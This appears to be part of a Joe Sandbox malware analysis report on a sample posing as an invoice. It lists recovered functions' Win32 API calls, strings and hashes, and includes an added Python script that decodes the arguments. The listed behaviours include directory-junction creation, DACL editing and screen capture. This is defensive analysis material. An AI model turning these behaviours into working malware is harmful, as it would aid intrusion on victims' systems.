                                                              • Opcode Fuzzy Hash: 1d4c84ccd3f3bd9a9f33cb73bebe98324c882ab52044d0560487b5f8a6fee04b
                                                              • Instruction Fuzzy Hash: 5361F07152021ABAEF28DF24DC86FBE77ACBF14765F104105F915D60D0EBB09AA4CBA4
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 0023D292
                                                              • GetDriveTypeW.KERNEL32 ref: 0023D2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0023D38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: ff8f5a8d6487da2591613bfd0330b8e0e5ff3a83fdef4f79882605e64a821faf
                                                              • Instruction ID: 1916c69001ac70b133a020091f97dad0f5582479a0b838c0f3d838a35e5f8d70
                                                              • Opcode Fuzzy Hash: ff8f5a8d6487da2591613bfd0330b8e0e5ff3a83fdef4f79882605e64a821faf
                                                              • Instruction Fuzzy Hash: 81514AB16143099FC700EF20D98196AB7F4EF99758F00485DF98967292DB31AE1ACF82
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00263973,00000016,0000138C,00000016,?,00000016,0028DDB4,00000000,?), ref: 002326F1
                                                              • LoadStringW.USER32(00000000,?,00263973,00000016), ref: 002326FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00263973,00000016,0000138C,00000016,?,00000016,0028DDB4,00000000,?,00000016), ref: 0023271C
                                                              • LoadStringW.USER32(00000000,?,00263973,00000016), ref: 0023271F
                                                              • __swprintf.LIBCMT ref: 0023276F
                                                              • __swprintf.LIBCMT ref: 00232780
                                                              • _wprintf.LIBCMT ref: 00232829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00232840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: 7373d0b534bec123ce1cbfad3d9cf470733e49ad45656a651a9841fe445ca5c3
                                                              • Instruction ID: f388f32454ec68d990c935ad9fd9c8fb495d710562f4e9031104fe3d78430353
                                                              • Opcode Fuzzy Hash: 7373d0b534bec123ce1cbfad3d9cf470733e49ad45656a651a9841fe445ca5c3
                                                              • Instruction Fuzzy Hash: 08411F7280021DAACB14FBE0DE86DFEB779AF65344F100065B60576092EB706F59DBA0
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0023D0D8
                                                              • __swprintf.LIBCMT ref: 0023D0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0023D137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0023D15C
                                                              • _memset.LIBCMT ref: 0023D17B
                                                              • _wcsncpy.LIBCMT ref: 0023D1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0023D1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 0023D1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0023D200
                                                              • CloseHandle.KERNEL32(00000000), ref: 0023D20A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 8a54ae71355ebd0b00b3dd30c251366eb2d74c04f7edece3d469769590717268
                                                              • Instruction ID: 95b115f9b8a467f4e35a6d41ab069320182a16c22676264a2116d6fe6b0cc2df
                                                              • Opcode Fuzzy Hash: 8a54ae71355ebd0b00b3dd30c251366eb2d74c04f7edece3d469769590717268
                                                              • Instruction Fuzzy Hash: FB3170B291010AABDB21DFA0EC49FEB77BDEF89740F5040B6F90DD2161E77096958B24
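The records in this section list, for each function recovered from the memory dump, the Win32 calls with their arguments as raw hexadecimal. As an added example (not part of the Joe Sandbox report and not code from the sample), the Python below parses those API lines into structured calls and decodes the constants that matter for triage in the record above: the CreateFileW access mask, disposition and flags, and the DeviceIoControl control code 0x900A4, which unpacks as CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS), i.e. FSCTL_SET_REPARSE_POINT. The sample record is copied from the lines above (plus one "Part of subcall function" line from a later record to exercise that shape); the constant tables and the ApiCall/describe names are this example's own, not Joe Sandbox's.

```python
"""Parse the 'APIs' lines of a Joe Sandbox function record and decode the
Win32 constants in them.  Added example; not Joe Sandbox tooling."""
import re
from dataclasses import dataclass
from typing import Optional

# Report line shapes handled (bullet, optional subcall prefix, optional argument list):
#   • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0023D15C
#   • GetFocus.USER32 ref: 0025EF4B
#     • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex literals, None for an unresolved '?'
    ref: int                        # address of the call site
    subcall: Optional[int] = None   # callee address when the call is inside a subcall


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one report line, or None for non-API lines."""
    m = _API_RE.match(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok in ("", "?") else int(tok, 16))  # "-00000001" -> -1
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_record(text: str) -> list:
    """All API calls of one record, in report order; other lines are skipped."""
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def decode_ioctl(code: int) -> dict:
    """Unpack CTL_CODE(DeviceType, Function, Method, Access) bit fields."""
    return {"device_type": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}


KNOWN_IOCTLS = {  # reparse-point FSCTLs; device type 9 = FILE_DEVICE_FILE_SYSTEM
    0x900A4: "FSCTL_SET_REPARSE_POINT",
    0x900A8: "FSCTL_GET_REPARSE_POINT",
    0x900AC: "FSCTL_DELETE_REPARSE_POINT",
}
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def _names(value: int, table: dict) -> str:
    return "|".join(name for bit, name in table.items() if value & bit) or "0"


def describe(calls: list) -> list:
    """Human-readable notes for the calls whose constants this example decodes."""
    notes = []
    for c in calls:
        if c.api == "CreateFileW" and len(c.args) >= 6:
            access, disp, flags = c.args[1], c.args[4], c.args[5]
            notes.append("CreateFileW access=%s disposition=%s flags=%s" % (
                _names(access, ACCESS_BITS) if access is not None else "?",
                DISPOSITION.get(disp, "?"),
                _names(flags, FILE_FLAGS) if flags is not None else "?"))
        elif c.api == "DeviceIoControl" and len(c.args) >= 2 and c.args[1] is not None:
            d = decode_ioctl(c.args[1])
            notes.append("DeviceIoControl %s (%s, device_type=%d function=%d)" % (
                hex(c.args[1]), KNOWN_IOCTLS.get(c.args[1], "unknown"),
                d["device_type"], d["function"]))
    return notes


# Copied from the report record above, plus one subcall line from a later record.
SAMPLE_RECORD = """\
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0023D15C
• _memset.LIBCMT ref: 0023D17B
• _wcsncpy.LIBCMT ref: 0023D1B7
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0023D1EC
• CloseHandle.KERNEL32(00000000), ref: 0023D1F7
• RemoveDirectoryW.KERNEL32(?), ref: 0023D200
• CloseHandle.KERNEL32(00000000), ref: 0023D20A
  • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
"""

if __name__ == "__main__":
    for note in describe(parse_record(SAMPLE_RECORD)):
        print(note)
```

Read together with the `\??\%s` string and the trailing RemoveDirectoryW, the decoded calls say what this function does: open a directory with GENERIC_WRITE and FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, set a reparse point on it whose substitute name is formatted from `\??\%s` (the NT path form a directory junction carries), and remove the directory again on failure. The same parser works on every record in this section; only the decode tables need extending for other APIs of interest.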
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0025BEF4,?,?), ref: 0025E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 0025E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0025E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0025BEF4,?,?,00000000,?), ref: 0025E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0027D9BC,?), ref: 0025E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 0025E7E5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0025E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0025E834
                                                              • DeleteObject.GDI32(00000000), ref: 0025E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0025E872
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: 256a9f3ef55c011fbb327d716369826daa845df8609126327516865b9a1e64f6
                                                              • Instruction ID: 02e4a37925feeb0713ff2607bf547bdfaf76910e6f990ed460c8a53e0ca84ed9
                                                              • Opcode Fuzzy Hash: 256a9f3ef55c011fbb327d716369826daa845df8609126327516865b9a1e64f6
                                                              • Instruction Fuzzy Hash: 6F415B75600205FFDB119F65EC4CEAABBB9EF89711F108058F909D7261C731AE85DB20
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0024076F
                                                              • _wcscat.LIBCMT ref: 00240787
                                                              • _wcscat.LIBCMT ref: 00240799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002407AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 002407C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 002407DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 002407F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: e1a33b1765406374e555676a0a5a268d1ffc914d039c580fd31f90041bdca2cf
                                                              • Instruction ID: 42ccc534db08331c8f14fbe53a31bd8a72bbcfeed9c2b172400a4a973f908c0c
                                                              • Opcode Fuzzy Hash: e1a33b1765406374e555676a0a5a268d1ffc914d039c580fd31f90041bdca2cf
                                                              • Instruction Fuzzy Hash: 198182715243069FCB28DF24C48596EB3E8BFD8304F15482EFA8AD7251E770D9A58F92
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0025EF3B
                                                              • GetFocus.USER32 ref: 0025EF4B
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0025EF56
                                                              • _memset.LIBCMT ref: 0025F081
                                                              • GetMenuItemInfoW.USER32 ref: 0025F0AC
                                                              • GetMenuItemCount.USER32(00000000), ref: 0025F0CC
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0025F0DF
                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0025F113
                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0025F15B
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0025F193
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0025F1C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 1b663b06864a2446a549ee7f391b6013a252d6fe97f87ac3271606fda2275e8b
                                                              • Instruction ID: ead8ee36b94178ab6621b52fb17bcf7daf5c5dd0899f5fb26783b41263e1b728
                                                              • Opcode Fuzzy Hash: 1b663b06864a2446a549ee7f391b6013a252d6fe97f87ac3271606fda2275e8b
                                                              • Instruction Fuzzy Hash: 6081AB70124302AFDB24CF14D984A6BBBE8FF88315F10452EFD8897291D770D929CBA6
                                                              APIs
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                                • Part of subcall function 0022ABBB: GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                                • Part of subcall function 0022ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                                • Part of subcall function 0022ABBB: HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                                • Part of subcall function 0022AC56: GetProcessHeap.KERNEL32(00000008,0022A6B5,00000000,00000000,?,0022A6B5,?), ref: 0022AC62
                                                                • Part of subcall function 0022AC56: HeapAlloc.KERNEL32(00000000,?,0022A6B5,?), ref: 0022AC69
                                                                • Part of subcall function 0022AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0022A6B5,?), ref: 0022AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0022A8CB
                                                              • _memset.LIBCMT ref: 0022A8E0
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0022A8FF
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A910
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0022A94D
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0022A969
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A986
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0022A995
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022A99C
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0022A9BD
                                                              • CopySid.ADVAPI32(00000000), ref: 0022A9C4
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0022A9F5
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0022AA1B
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0022AA2F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: e1dae23bc0edf81779a44bc40b6565f4776e262b6c00c84cc0a66e4321caa024
                                                              • Instruction ID: 902c8002e7ad143f85a800d2c994b230dd0420a257df95dba1c0dc3b75986c1d
                                                              • Opcode Fuzzy Hash: e1dae23bc0edf81779a44bc40b6565f4776e262b6c00c84cc0a66e4321caa024
                                                              • Instruction Fuzzy Hash: 18515A7191021ABFDF00DF90EC89EEEBBB9FF04300F048129F915AA690DB309A55CB61
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00249E36
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00249E42
                                                              • CreateCompatibleDC.GDI32(?), ref: 00249E4E
                                                              • SelectObject.GDI32(00000000,?), ref: 00249E5B
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00249EAF
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00249EEB
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00249F0F
                                                              • SelectObject.GDI32(00000006,?), ref: 00249F17
                                                              • DeleteObject.GDI32(?), ref: 00249F20
                                                              • DeleteDC.GDI32(00000006), ref: 00249F27
                                                              • ReleaseDC.USER32(00000000,?), ref: 00249F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 13ca1ca0e5e8e33a1fbd6f0710af5a90b631cce19ef4ecd67503f55f6b0b1d5c
                                                              • Instruction ID: 3193fa1509703eec613a0c6bf6f5c9f57a4cbf4886672b1852a660251ad9ec76
                                                              • Opcode Fuzzy Hash: 13ca1ca0e5e8e33a1fbd6f0710af5a90b631cce19ef4ecd67503f55f6b0b1d5c
                                                              • Instruction Fuzzy Hash: 44513875A00309EFCB14CFA8D889EAFBBB9EF48710F14841DF95AA7250D731A981CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-2391861430
                                                              • Opcode ID: d92d00f7ea892928024ee63383f833def75c1f014d62a7d713b8f98b59a97b97
                                                              • Instruction ID: 8eaebe3386322e029d31302417c5a08c386debba885b4a670f2ba0ffb894af4a
                                                              • Opcode Fuzzy Hash: d92d00f7ea892928024ee63383f833def75c1f014d62a7d713b8f98b59a97b97
                                                              • Instruction Fuzzy Hash: C0518C7181010DABCB14FBA0DE46EEEB779AF19344F200165F605720A2EB316F69DFA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 2889450990-3420473620
                                                              • Opcode ID: 623d7651ca698d609c03a4c069365929e45416478b36531b98adbd1536812f19
                                                              • Instruction ID: d3c2837d9f05072ccb6783a3fd9b55fb8e06f2710cf9df22999afaf358d44ede
                                                              • Opcode Fuzzy Hash: 623d7651ca698d609c03a4c069365929e45416478b36531b98adbd1536812f19
                                                              • Instruction Fuzzy Hash: 1C51A07191020DAACB14FBE0DE46EEEB779AF15344F100165F60572092EB706F69DFA0
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: $E*$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
